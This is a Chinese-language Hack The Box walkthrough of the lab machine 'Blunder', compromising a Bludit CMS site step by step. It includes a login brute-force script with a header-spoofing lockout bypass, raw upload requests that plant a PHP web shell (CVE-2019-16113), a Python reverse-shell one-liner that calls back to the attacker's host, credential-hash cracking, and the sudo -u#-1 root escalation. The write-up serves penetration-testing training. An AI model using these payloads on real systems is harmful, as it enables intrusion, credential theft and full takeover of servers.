2020-06-01
1.9k
HTB::Blunder Walkthrough
0x01 Info Card
nmap
dirsearch
wfuzz
cewl
CMS password leakage
sudo -u#-1
0x03 Pentesting
Initial Enumeration
nmap扫描端口:
1 2 3 4 5 6 7 8 9 10 11 12 13 Nmap scan report for blunder.htb (10.10.10.191) Host is up (0.28s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: Blunder |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Blunder | A blunder of interesting facts Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
dirsearch扫描路径:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 $ sudo dirsearch -u http://blunder.htb -e * Extensions: 46060.txt | HTTP method: get | Threads: 10 | Wordlist size: 6124 Target: http://blunder.htb [17:25:56] Starting: [17:25:59] 200 - 7KB - /%3f/ [17:26:07] 200 - 563B - /.gitignore [17:26:24] 200 - 7KB - /0 [17:26:41] 200 - 3KB - /about [17:26:49] 301 - 0B - /admin -> http://10.10.10.191/admin/ [17:26:53] 200 - 2KB - /admin/.config [17:26:53] 200 - 2KB - /admin/ ... ... [17:29:40] 200 - 2KB - /admin/web/ [17:29:40] 200 - 2KB - /admin/login.htm [17:31:22] 301 - 0B - /domcfg.nsf/?open -> http://10.10.10.191/domcfg.nsf [17:32:02] 200 - 30B - /install.php [17:32:14] 200 - 1KB - /LICENSE [17:33:29] 200 - 3KB - /README.md [17:33:33] 200 - 22B - /robots.txt
admin需要登录名和密码,.gitignore和robots.txt没有可利用的信息,现在应该是要寻找后台的登陆凭证。
wfuzz扫描web目录下有没有什么敏感文件:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://blunder.htb/FUZZ.txt" -t 100 ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer * ******************************************************** Target: http://blunder.htb/FUZZ.txt Total requests: 4652 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000003513: 200 1 L 4 W 22 Ch "robots" 000004119: 200 4 L 23 W 118 Ch "todo" Total time: 44.66474 Processed Requests: 4652 Filtered Requests: 4650 Requests/sec.: 104.1537
todo.txt
1 2 3 4 -Update the CMS -Turn off FTP - DONE -Remove old users - DONE -Inform fergus that the new blog needs images - PENDING
盲猜一手fergus应该登录名username,再去寻找password。找了大半天没什么进展,按照HTB的尿性,应该要用主页上的信息生成自定义的字典。
1 2 3 4 $ cewl -w wordlists.txt -d 10 -m 1 http://blunder.htb/ $ wc wordlist.txt 354 354 2459 wordlist.txt
用burp和wfuzz工具都没能Brute Force出来,只能写Python脚本爆破了:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 import reimport requestsdef open_resources (file_path ): return [item.replace("\n" , "" ) for item in open(file_path).readlines()] host = 'http://10.10.10.191' login_url = host + '/admin/login' username = 'fergus' wordlist = open_resources('/home/Hackthebox/Blunder/wordlist.txt' ) for password in wordlist: session = requests.Session() login_page = session.get(login_url) csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"' , login_page.text).group(1 ) print('[*] Trying: {p}' .format(p = password)) headers = { 'X-Forwarded-For' : password, 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36' , 'Referer' : login_url } data = { 'tokenCSRF' : csrf_token, 'username' : username, 'password' : password, 'save' : '' } login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False ) if 'location' in login_result.headers: if '/admin/dashboard' in login_result.headers['location' ]: print() print('SUCCESS: Password found!' ) print('Use {u}:{p} to login.' .format(u = username, p = password)) print() break
跑出来的结果:
1 2 3 4 5 [*] Trying: character [*] Trying: RolandDeschain () SUCCESS: Password found! Use fergus:RolandDeschain to login.
用fergus:RolandDeschain 登录后台管理系统:
发现这个使用开源的Bludit CMS搭建的,Google一下看有没有公开的CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16113
顺着References中的Github链接还找到作者发现CVE的过程,而且还是中国人,@christa。(这次终于不用看英文的利用过程了😄)
https://christa.top/details/46/
首先上传.htaccess文件,用burp改包绕过前端的后缀名验证:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 POST /admin/ajax/upload-images HTTP/1.1 Host: blunder.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://blunder.htb/admin/new-content X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5424398841862763197378512212 Content-Length: 531 Connection: close Cookie: BLUDITREMEMBERUSERNAME=fergus; BLUDITREMEMBERTOKEN=d08d8cfe8c70b89c242b0a33531998d7; BLUDIT-KEY=dpodie00jad4a6akmo5hookqd2 -----------------------------5424398841862763197378512212 Content-Disposition: form-data; name="images[]"; filename=".htaccess" Content-Type: image/jpeg RewriteEngine Off -----------------------------5424398841862763197378512212 Content-Disposition: form-data; name="uuid" 0fad6e18e5d590f2af2b005ac4f7f80f -----------------------------5424398841862763197378512212 Content-Disposition: form-data; name="tokenCSRF" 7ca474f9c654ff0e46761ac0e435423a5a8c012a -----------------------------5424398841862763197378512212--
再上传shell文件:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 POST /admin/ajax/upload-images HTTP/1.1 Host: blunder.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://blunder.htb/admin/new-content X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5424398841862763197378512212 Content-Length: 540 Connection: close Cookie: BLUDITREMEMBERUSERNAME=fergus; BLUDITREMEMBERTOKEN=d08d8cfe8c70b89c242b0a33531998d7; BLUDIT-KEY=dpodie00jad4a6akmo5hookqd2 -----------------------------5424398841862763197378512212 Content-Disposition: form-data; name="images[]"; filename="shell.php" Content-Type: image/jpeg GIF89a <?php system($_GET['cmd']); ?> -----------------------------5424398841862763197378512212 Content-Disposition: form-data; name="uuid" 0fad6e18e5d590f2af2b005ac4f7f80f -----------------------------5424398841862763197378512212 Content-Disposition: form-data; name="tokenCSRF" 7ca474f9c654ff0e46761ac0e435423a5a8c012a -----------------------------5424398841862763197378512212--
本地监听端口,浏览器访问shell文件,cmd参数如下:
1 http://blunder.htb/bl-content/tmp/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
本机得到reverse shell:
1 2 3 4 5 6 7 8 9 # kali @ kali in ~/HackTheBox/Blunder [17:25:45] $ nc -lvnp 9999 listening on [any] 9999 ... connect to [10.10.14.4] from (UNKNOWN) [10.10.10.191] 59878 /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data)
Getting User Access
接下来的工作就是要找提权的用户名和密码了,这种简单难度的靶机一般会在某些文件中泄露这些信息~
经过一番查找,发现在/var/www目录下还有另外一个新版本的Bludit CMS,其中有一个文件是在/var/www/bludit-3.10.0a/bl-content/databases下面,文件名是users.php:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <?php defined('BLUDIT' ) or die ('Bludit CMS.' ); ?> { "admin" : { "nickname" : "Hugo" , "firstName" : "Hugo" , "lastName" : "" , "role" : "User" , "password" : "faca404fd5c0a31cf1897b823c695c85cffeb98d" , "email" : "" , "registered" : "2019-11-27 07:40:55" , "tokenRemember" : "" , "tokenAuth" : "b380cb62057e9da47afce66b4615107d" , "tokenAuthTTL" : "2009-03-15 14:00" , "twitter" : "" , "facebook" : "" , "instagram" : "" , "codepen" : "" , "linkedin" : "" , "github" : "" , "gitlab" : "" } }
很明显有一个password,看样子应该是经过了一次hash,用hash-identifier查看加密方式:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 Possible Hashs: [+] SHA-1 [+] MySQL5 - SHA-1(SHA-1($pass )) Least Possible Hashs: [+] Tiger-160 [+] Haval-160 [+] RipeMD-160 [+] SHA-1(HMAC) [+] Tiger-160(HMAC) [+] RipeMD-160(HMAC) [+] Haval-160(HMAC) [+] SHA-1(MaNGOS) [+] SHA-1(MaNGOS2) [+] sha1($pass .$salt ) [+] sha1($salt .$pass ) [+] sha1($salt .md5($pass )) [+] sha1($salt .md5($pass ).$salt ) [+] sha1($salt .sha1($pass )) [+] sha1($salt .sha1($salt .sha1($pass ))) [+] sha1($username .$pass ) [+] sha1($username .$pass .$salt ) [+] sha1(md5($pass )) [+] sha1(md5($pass ).$salt ) [+] sha1(md5(sha1($pass ))) [+] sha1(sha1($pass )) [+] sha1(sha1($pass ).$salt ) [+] sha1(sha1($pass ).substr($pass ,0,3)) [+] sha1(sha1($salt .$pass )) [+] sha1(sha1(sha1($pass ))) [+] sha1(strtolower($username ).$pass ) --------------------------------------------------
在线加密工具:https://md5decrypt.net/en/Sha1
输入faca404fd5c0a31cf1897b823c695c85cffeb98d得到明文Password120。
su切换用户:
1 2 3 4 5 6 7 8 9 10 11 12 www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo su hugo Password: Password120 hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ id id uid=1001(hugo) gid=1001(hugo) groups=1001(hugo) hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cd catcd hugo@blunder:~$ user.txt cat user.txt 947a-----------------------a7bb
Getting Root Access
按照套路:
1 2 3 4 5 6 7 8 9 10 hugo@blunder:~$ sudo -l sudo -l Password: Password120 Matching Defaults entries for hugo on blunder: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User hugo may run the following commands on blunder: (ALL, !root) /bin/bash
Google (ALL, !root) /bin/bash,有下面这种提权方式:
https://www.exploit-db.com/exploits/47502
很简单,一个命令解决:
1 2 3 4 5 6 7 8 9 10 hugo@blunder:~$ sudo -u#-1 /bin/bash sudo -u#-1 /bin/bash root@blunder:/home/hugo# id id uid=0(root) gid=1001(hugo) groups=1001(hugo) root@blunder:/home/hugo# cd cd root@blunder:/# cat /root/root.txt cat /root/root.txt b4c0------------------------d45f
这个靶机除了找密码的过程,其他还是算蛮简单的~~
0x04 Reference
